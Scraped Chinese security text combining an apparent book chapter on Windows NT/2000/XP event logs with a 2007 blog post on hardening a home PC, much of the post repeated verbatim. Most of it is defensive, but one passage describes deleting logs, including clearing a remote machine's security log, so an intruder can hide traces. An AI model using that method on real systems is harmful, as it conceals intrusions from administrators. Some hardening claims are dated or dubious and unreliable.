Windows NT的日志系统通常放在下面的位置,根据操作系统的不同略有变化。
C:\systemroot\system32\config\sysevent.evt
C:\systemroot\system32\config\secevent.evt
C:\systemroot\system32\config\appevent.evt
Windows NT使用了一种特殊的格式存放它的日志文件,这种格式的文件可以被事件查看器读取,事件查看器可以在“控制面板”中找到,系统管理员可以使用事件查看器选择要查看的日志条目,查看条件包括类别、用户和消息类型。
3.Windows 2000的日志系统
与Windows NT一样,Windows 2000中也一样使用“事件查看器”来管理日志系统,也同样需要用系统管理员身份进入系统后方可进行操作,如图7-1所示。
在Windows 2000中,日志文件的类型比较多,通常有应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而略有变化。启动Windows 2000时,事件日志服务会自动启动,所有用户都可以查看“应用程序日志”,但是只有系统管理员才能访问“安全日志”和“系统日志”。系统默认的情况下会关闭“安全日志”,但我们可以使用“组策略”来启用“安全日志”开始记录。安全日志一旦开启,就会无限制的记录下去,直到装满时停止运行。
Windows 2000日志文件默认位置:
应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\sys tem32\config,默认文件大小512KB,但有经验的系统管理员往往都会改变这个默认大小。
安全日志文件:c:\sys temroot\sys tem32\config\SecEvent.EVT
系统日志文件:c:\sys temroot\sys tem32\config\SysEvent.EVT
应用程序日志文件:c:\sys temroot\sys tem32\config\AppEvent.EVT
Internet信息服务FTP日志默认位置:c:\systemroot\sys tem32\logfiles\msftpsvc1\。
Internet信息服务WWW日志默认位置:c:\systemroot\sys tem32\logfiles\w3svc1\。
Scheduler服务器日志默认位置:c:\systemroot\schedlgu.txt 。该日志记录了访问者的IP,访问的时间及请求访问的内容。
因Windows2000延续了NT的日志文件,并在其基础上又增加了FTP和WWW日志,故本节对FTP日志和WWW日志作一个简单的讲述。FTP日志以文本形式的文件详细地记录了以FTP方式上传文件的文件、来源、文件名等等。不过由于该日志太明显,所以高级黑客们根本不会用这种方法来传文件,取而代之的是使用RCP。FTP日志文件和WWW日志文件产生的日志一般在c:\sys temroot\system32\LogFiles\W3SVC1目录下,默认是每天一个日志文件,
FTP和WWW日志可以删除,但是FTP日志所记录的一切还是会在系统日志和安全日志里记录下来,如果用户需要尝试删除这些文件,通过一些并不算太复杂的方法,例如首先停止某些服务,然后就可以将该日志文件删除。具体方法本节略。
Windows 2000中提供了一个叫做安全日志分析器(CyberSafe Log Analyst,CLA)的工具,有很强的日志管理功能,它可以使用户不必在让人眼花缭乱的日志中慢慢寻找某条记录,而是通过分类的方式将各种事件整理好,让用户能迅速找到所需要的条目。它的另一个突出特点是能够对整个网络环境中多个系统的各种活动同时进行分析,避免了一个个单独去分析的麻烦。
4.Windows XP日志文件
说Windows XP的日志文件,就要先说说Internet连接防火墙(ICF)的日志,ICF的日志可以分为两类:一类是ICF审核通过的IP数据包,而一类是ICF抛弃的IP数据包。日志一般存于Windows目录之下,文件名是pfirewall.log。其文件格式符合W3C扩展日志文件格式(W3C Extended Log File Format),分为两部分,分别是文件头(Head Information)和文件主体(Body Information)。文件头主要是关于Pfirewall.log这个文件的说明,需要注意的主要是文件主体部分。文件主体部分记录有每一个成功通过ICF审核或者被ICF所抛弃的IP数据包的信息,包括源地址、目的地址、端口、时间、协议以及其他一些信息。理解这些信息需要较多的TCP/IP协议的知识。ICF生成安全日志时使用的格式是W3C扩展日志文件格式,这与在常用日志分析工具中使用的格式类似。 当我们在WindowsXP的“控制面板”中,打开事件查看器.
就可以看到WindowsXP中同样也有着系统日志、安全日志和应用日志三种常见的日志文件,当你单击其中任一文件时,就可以看见日志文件中的一些记录.
若要启用对不成功的连接尝试的记录,请选中“记录丢弃的数据包”复选框,否则禁用。另外,我们还可以用金山网镖等工具软件将“安全日志”导出和被删除。
5.日志分析
当日志每天都忠实的为用户记录着系统所发生的一切的时候,用户同样也需要经常规范管理日志,但是庞大的日志记录却又令用户茫然失措,此时,我们就会需要使用工具对日志进行分析、汇总,日志分析可以帮助用户从日志记录中获取有用的信息,以便用户可以针对不同的情况采取必要的措施。
6.系统日志的删除
因操作系统的不同,所以日志的删除方法也略有变化,本文从Windows 98和Windows 2000两种有明显区别的操作系统来讲述日志的删除。
7.Windows 98下的日志删除
在纯DOS下启动计算机,用一些常用的修改或删除命令就可以消除Windows 98日志记录。当重新启动Windows98后,系统会检查日志文件的存在,如果发现日志文件不存在,系统将自动重建一个,但原有的日志文件将全部被消除。
8.Windows 2000的日志删除
Windows 2000的日志可就比Windows 98复杂得多了,我们知道,日志是由系统来管理、保护的,一般情况下是禁止删除或修改,而且它还与注册表密切相关。在Windows 2000中删除日志首先要取得系统管理员权限,因为安全日志和系统日志必须由系统管理员方可查看,然后才可以删除它们。
我们将针对应用程序日志,安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志的删除做一个简单的讲解。要删除日志文件,就必须停止系统对日志文件的保护功能。我们可以使用命令语句来删除除了安全日志和系统日志外的日志文件,但安全日志就必须要使用系统中的“事件查看器”来控制它,打开“控制面板”的“管理工具”中的“事件查看器”。在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单.
输入远程计算机的IP,然后需要等待,选择远程计算机的安全性日志,点击属性里的“清除日志”按钮即可。
9.发现入侵踪迹
如何当入侵者企图或已经进行系统的时候,及时有效的发现踪迹是目前防范入侵的热门话题之一。发现入侵踪迹的前题就是应该有一个入侵特征数据库,我们一般使用系统日志、防火墙、检查IP报头(IP header)的来源地址、检测Email的安全性以及使用入侵检测系统(IDS)等来判断是否有入侵迹象。
我们先来学习一下如何利用端口的常识来判断是否有入侵迹象:
电脑在安装以后,如果不加以调整,其默认开放的端口号是139,如果不开放其它端口的话,黑客正常情况下是无法进入系统的。如果平常系统经常进行病毒检查的话,而突然间电脑上网的时候会感到有反应缓慢、鼠标不听使唤、蓝屏、系统死机及其它种种不正常的情况,我们就可以判断有黑客利用电子信件或其它方法在系统中植入的特洛伊木马。此时,我们就可以采取一些方法来清除它,具体方法在本书的相关章节可以查阅。
10.遭受入侵时的迹象
入侵总是按照一定的步骤在进行,有经验的系统管理员完全可以通过观察到系统是否出现异常现象来判断入侵的程度。
11.扫描迹象
当系统收到连续、反复的端口连接请求时,就可能意味着入侵者正在使用端口扫描器对系统进行外部扫描。高级黑客们可能会用秘密扫描工具来躲避检测,但实际上有经验的系统管理员还是可以通过多种迹象来判断一切。
12.利用攻击
当入侵者使用各种程序对系统进行入侵时,系统可能报告出一些异常情况,并给出相关文件(IDS常用的处理方法),当入侵者入侵成功后,系统总会留下或多或少的破坏和非正常访问迹象,这时就应该发现系统可能已遭遇入侵。
打造100%绝对安全的个人电脑
[ 2007-03-25 03:49:03 | 作者: sun ]
细想一下,现在大多数人的电脑这只未必安全,真好闲暇无事,特发此帖,希望对大家有所帮助!!!
由于现在家用电脑所使用的操作系统多数为WinXP 和Win2000 pro(建议还在使用98的朋友换换系统,连_blank/>微软都放弃了的系统你还用它干嘛?)所以后面我将主要讲一下基于这两个操作系统的安全防范。
个人电脑常见的被入侵方式
谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:
(1) 被他人盗取密码;
(2) 系统被_blank/>木马攻击;
(3) 浏览网页时被恶意的java scrpit程序攻击;
(4) QQ被攻击或泄漏信息;
(5) 病毒感染;
(6) 系统存在漏洞使他人攻击自己。
(7) _blank/>黑客的恶意攻击。
下面我们就来看看通过什么样的手段来更有效的防范攻击。
查本地共享资源
删除共享
删除ipc$空连接
账号密码的安全原则
关闭自己的139端口
445端口的关闭
3389的关闭
4899的防范
常见端口的介绍
如何查看本机打开的端口和过滤
禁用服务
本地策略
本地安全策略
用户权限分配策略
终端服务配置
用户和组策略
防止rpc漏洞
自己动手DIY在本地策略的安全选项
工具介绍
避免被恶意代码 木马等病毒攻击
1.查看本地共享资源
运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit,在_blank/>注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
4.关闭自己的139端口,ipc和RPC漏洞存在于此。
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
5.防止rpc漏洞
打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
XP SP2和2000 pro sp4,均不存在该漏洞。
6.445端口的关闭
修改注册表,添加一个键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为0这样就ok了。
7.3389的关闭
XP:我的电脑上点右键选属性--/>远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
Win2000server 开始--/>程序--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
使用2000 pro的朋友注意,网络上有很多文章说在Win2000pro 开始--/>设置--/>控制面板--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。
8.4899的防范
网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
9、禁用服务
若PC没有特殊用途,基于安全考虑,打开控制面板,进入管理工具——服务,关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接]
5.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
6.Messenger[警报]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
8.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
9.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
10.Remote Desktop Help Session Manager[管理并控制远程协助]
11.Remote Registry[使远程计算机用户修改本地注册表]
12.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
13.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到网络]
15.Telnet[允许远程用户登录到此计算机并运行程序]
16.Terminal Services[允许用户以交互方式连接到远程计算机]
17.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。
10、账号密码的安全原则
首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),然后设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~)
如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。
打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是8
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的_blank/>加密来存储密码 禁用
11、本地策略:
这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)
打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
&nb sp;然后再到管理工具找到
事件查看器
应用程序:右键/>属性/>设置日志大小上限,我设置了50mb,选择不覆盖事件
安全性:右键/>属性/>设置日志大小上限,我也是设置了50mb,选择不覆盖事件
系统:右键/>属性/>设置日志大小上限,我都是设置了50mb,选择不覆盖事件
12、本地安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.(前面已经详细讲过拉 )
13、用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过远端强制关机。删掉
14、终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准Windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
15、用户和组策略
打开管理工具
计算机管理.本地用户和组.用户;
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不分组了,每必要把
16、自己动手DIY在本地策略的安全选项
1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3)对匿名连接的额外限制
4)禁止按 alt+crtl +del(没必要)
5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6)只有本地登陆用户才能访问cd-rom
7)只有本地登陆用户才能访问软驱
8)取消关机原因的提示
A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9)禁止关机事件跟踪
开始“Start -/>”运行“ Run -/>输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算机配置“(Computer Configuration )-/> ”管理模板“(Administrative Templates)-/> ”系统“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口
17、常见端口的介绍
TCP
21 FTP
22 SSH
23 TELNET
25 TCP SMTP
53 TCP DNS
80 HTTP
135 epmap
138 [冲击波]
139 smb
445
1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b
1026 DCE/12345778-1234-abcd-ef00-0123456789ac
1433 TCP SQL SERVER
5631 TCP PCANYWhere
5632 UDP PCANYWhere
3389 Terminal Services
4444[冲击波]
UDP
67[冲击波]
137 netbios-ns
161 An SNMP Agent is running/ Default community names of the SNMP Agent
关于UDP一般只有腾讯QQ会打开4000或者是8000端口或者8080,那么,我们只运 行本机使用4000这几个端口就行了
18、另外介绍一下如何查看本机打开的端口和tcp\ip端口的过滤
开始--运行--cmd
输入命令netstat -a
会看到例如(这是我的机器开放的端口)
Proto Local Address Foreign Address State
TCP yf001:epmap yf001:0 LISTE
TCP yf001:1025 yf001:0 LISTE
TCP (用户名):1035 yf001:0 LISTE
TCP yf001:netbios-ssn yf001:0 LISTE
UDP yf001:1129 *:*
UDP yf001:1183 *:*
UDP yf001:1396 *:*
UDP yf001:1464 *:*
UDP yf001:1466 *:*
UDP yf001:4000 *:*
UDP yf001:4002 *:*
UDP yf001:6000 *:*
UDP yf001:6001 *:*
UDP yf001:6002 *:*
UDP yf001:6003 *:*
UDP yf001:6004 *:*
UDP yf001:6005 *:*
UDP yf001:6006 *:*
UDP yf001:6007 *:*
UDP yf001:1030 *:*
UDP yf001:1048 *:*
UDP yf001:1144 *:*
UDP yf001:1226 *:*
UDP yf001:1390 *:*
UDP yf001:netbios-ns *:*
UDP yf001:netbios-dgm *:*
UDP yf001:isakmp *:*
现在讲讲基于Windows的tcp/ip的过滤
控制面板——网络和拨号连接——本地连接——INTERNET协议(tcp/ip)--属性--高级---选项-tcp/ip筛选--属性!!
然后添加需要的tcp 和UDP端口就可以了~如果对端口不是很了解的话,不要轻易进行过滤,不然可能会导致一些程序无法使用。
19、关于浏览器
IE浏览器(或基于IE内核的浏览器)存在隐私问题,index.dat文件里记录着你上网的信息。所以我推荐大家换一款其他内核浏览器。
现在炒的很热的FireFox,就很不错,如果你想打造一款属于自己的个性化浏览器,那FireFox是首选。它有强大的扩展定制功能!
还有传说中那款最快的浏览器 Opera ,速度惊人,界面华丽,笔者正在使用。(就在3个小时前,OPERA公司10年庆祝送正式注册码,笔者申请了两个,^_^)
当然,由于国内一些网页并不是用WC3组织认证的标准HTML语言编写,所以IE还是不能丢,留作备用。
处理IE隐私可以用:Webroot WindowWasher -- www.hanzify.org 上有正式版+汉化补丁
Ccleaner -- GOOGLE一下,官方占上有,多国语言的。
RAMDISK 用内存虚拟出一块硬盘,将缓存文件写进去,不仅解决了隐私问题,理论上还能提高网速。(建议内存/>=512M者使用)
20、最后一招,也是最关键的一招:安装杀软与防火墙
杀毒软件要看实力,绝对不能看广告。笔者在霏凡的病毒区混了半年,把杀软几乎也装了个遍,以下是个人心得:
1:国产杀软:江民一出,谁与争峰?KV的败笔就是当年那个硬盘炸弹吧,呵呵。其实论实力,江民在国内绝对是一支独秀。先进的杀毒引擎,较完整的病毒库,
清除活体病毒能力强,杀壳能力强,可杀连环DLL,监控灵敏,占系统内存小。--声明:我不是KV的枪手,因为国内的杀软公司普遍只会打广告,应该BS一下。
DB2005都到了2005了才杀两个壳?Rising的误报天下第一,可是随便下个毒包基本上没有它报的(不信的去霏凡病毒区试试:bbs.crsky.com);费尔还不错,
可是与KV比还有差距;光华虽然是主动升级,但毒库也不是很全。
2:国外杀软:百家争鸣!
Kapersky:这款俄国的杀软在国内极度火热,其拥有世界第一的毒库,毒库3小时一升级,对系统提供最完善的保护。
McAfee:美国杀软,柔和而强劲的保护,适合有点资历的用户。规则指定得当,百毒不侵。
Norton: 唉!老了老了,对国内木马简直是白痴。本不想说它,可是又是国际三大杀软之一,唉!
NOD32:占资源超小,杀毒超快,监控灵敏,只是毒库似乎有些不全。
BitDefender:罗马尼亚不错的杀软,能力平衡。
GData AntiVirusKit:真正的强悍!它用Kapersky+BitDefender的双引擎,而且经优化处理,系统不会很卡。
F-Scure:竟然夸张到4引擎!不过除了Kapersky4.0的引擎,其他的很一般。虽然保护是很周到,但用它笔者觉得不如AVK(上一个)。
笔者建议:一般配置 KV2005 or McAfee or Kapersky or GData AntiVirusKit;-配置稍好的可以用以上任一款(除KV2005)+ KV2004
老爷机配置 KV2004 or NOD32
较好的机器 GData AntiVirusKit+KV2005 or Kapersky+KV2005 or McAfee+KV2005
防火墙,系统的最后一道防线。即使杀软再强大,一些最新变种的木马仍能见缝插针。没有防火墙,你的机器很可能成为Haker的代理服务器,呵呵。还有,如果你的
系统有漏洞,Haker也会轻而易举的Contral Your PC.
强大的防火墙推荐:Look 'n' Stop :世界测评第一。占内存超小。启动超迅速。
ZoneAlarm :性力强大,功能很多,全面且稳定。
Tiny :这是一款专业到恐怖的防火墙,能力绝对强悍!适合较专业者使用。
天网:国内最强的了,只是和国外的比......
说一句,木马专杀的东西几乎没用,因为那些根本没有什么先进的引擎。如果一定要,就用ewido吧,这个还可以。
由于现在家用电脑所使用的操作系统多数为WinXP 和Win2000 pro(建议还在使用98的朋友换换系统,连_blank/>微软都放弃了的系统你还用它干嘛?)所以后面我将主要讲一下基于这两个操作系统的安全防范。
个人电脑常见的被入侵方式
谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:
(1) 被他人盗取密码;
(2) 系统被_blank/>木马攻击;
(3) 浏览网页时被恶意的java scrpit程序攻击;
(4) QQ被攻击或泄漏信息;
(5) 病毒感染;
(6) 系统存在漏洞使他人攻击自己。
(7) _blank/>黑客的恶意攻击。
下面我们就来看看通过什么样的手段来更有效的防范攻击。
查本地共享资源
删除共享
删除ipc$空连接
账号密码的安全原则
关闭自己的139端口
445端口的关闭
3389的关闭
4899的防范
常见端口的介绍
如何查看本机打开的端口和过滤
禁用服务
本地策略
本地安全策略
用户权限分配策略
终端服务配置
用户和组策略
防止rpc漏洞
自己动手DIY在本地策略的安全选项
工具介绍
避免被恶意代码 木马等病毒攻击
1.查看本地共享资源
运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit,在_blank/>注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
4.关闭自己的139端口,ipc和RPC漏洞存在于此。
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
5.防止rpc漏洞
打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
XP SP2和2000 pro sp4,均不存在该漏洞。
6.445端口的关闭
修改注册表,添加一个键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为0这样就ok了。
7.3389的关闭
XP:我的电脑上点右键选属性--/>远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
Win2000server 开始--/>程序--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
使用2000 pro的朋友注意,网络上有很多文章说在Win2000pro 开始--/>设置--/>控制面板--/>管理工具--/>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。
8.4899的防范
网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
4899不象3389那样,是系统自带的服务。需要自己安装,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
9、禁用服务
若PC没有特殊用途,基于安全考虑,打开控制面板,进入管理工具——服务,关闭以下服务:
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接]
5.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
6.Messenger[警报]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
8.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
9.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
10.Remote Desktop Help Session Manager[管理并控制远程协助]
11.Remote Registry[使远程计算机用户修改本地注册表]
12.Routing and Remote Access[在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
13.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解析的支持而使用户能够共享文件、打印和登录到网络]
15.Telnet[允许远程用户登录到此计算机并运行程序]
16.Terminal Services[允许用户以交互方式连接到远程计算机]
17.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。
10、账号密码的安全原则
首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),然后设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~)
如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置adminstrator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。
打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是8
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的_blank/>加密来存储密码 禁用
11、本地策略:
这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)
打开管理工具
找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
&nb sp;然后再到管理工具找到
事件查看器
应用程序:右键/>属性/>设置日志大小上限,我设置了50mb,选择不覆盖事件
安全性:右键/>属性/>设置日志大小上限,我也是设置了50mb,选择不覆盖事件
系统:右键/>属性/>设置日志大小上限,我都是设置了50mb,选择不覆盖事件
12、本地安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,? 但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.(前面已经详细讲过拉 )
13、用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过远端强制关机。删掉
14、终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准Windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
15、用户和组策略
打开管理工具
计算机管理.本地用户和组.用户;
删除Support_388945a0用户等等
只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不分组了,每必要把
16、自己动手DIY在本地策略的安全选项
1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3)对匿名连接的额外限制
4)禁止按 alt+crtl +del(没必要)
5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6)只有本地登陆用户才能访问cd-rom
7)只有本地登陆用户才能访问软驱
8)取消关机原因的提示
A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高级”标签页面;
B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,单击“确定”按钮,来退出设置框;
C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,我们也能启用休眠功能键,来实现快速关机和开机;
D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9)禁止关机事件跟踪
